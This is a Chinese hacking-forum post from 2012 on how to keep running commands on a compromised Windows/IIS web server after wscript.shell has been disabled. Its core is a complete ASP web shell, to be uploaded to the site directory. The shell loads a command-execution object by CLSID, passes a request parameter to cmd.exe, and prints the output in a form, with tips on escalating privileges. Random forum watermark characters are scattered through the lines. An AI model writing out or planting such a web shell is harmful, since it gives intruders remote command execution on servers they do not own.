找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2077|回复: 0
打印 上一主题 下一主题

wscript.shell删除解决办法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:36:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
3 F/ m0 j. C, M0 X1 l; Z一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。6 ~5 }9 @1 r+ m% E, _& W
要想让运行命令可以试试这种方法,成功率为五五之数。
" [! p# W# l9 p7 M$ c  W把下面代码复制:! M2 r& E. A0 v% j
<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
. U4 }2 L2 e, o* }, B6 M9 S  \<%if err then%>
7 {" G4 `0 S, k4 O8 x7 m# S* [<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
* m, z4 F9 u1 ^7 c) e<%
% q% S& ?9 Q/ g; ~end if
' y$ c( d# k% I1 oresponse.write("<textarea readonly cols=80 rows=20>")
* L4 c. U  @& g, @On Error Resume Next# p3 z5 F0 o. }8 L
response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
, u3 K* c8 l. o3 c/ I) s, Cresponse.write("</textarea>")
7 _& R. F6 }$ C7 dresponse.write("<form method='post'>")
6 q2 a* p8 m: m2 Y+ jresponse.write("<input type=text name='c' size=60><br>")
2 f- u0 V! I4 z: Uresponse.write("<input type=submit value='执行'></form>")
6 E: w% ~' T) r: p5 g3 P/ Y* m1 @%>
4 S* i4 d( w0 B! l* d
1 k" @' K. D8 F- w8 b* ~9 b保存为一个asp文件,然后传到网站目录上去& C: V( I* Q/ r! F
运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。2 G  H# e7 u8 j& J) g# }
我用此成功运行过cacls命令。2 Q0 g" I' O, U2 L- Z! K6 g
3 n0 `- t( {+ Q5 {: }. |' {  s- D$ P
第二那就是运行时出错,可能限制某些代码执行
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表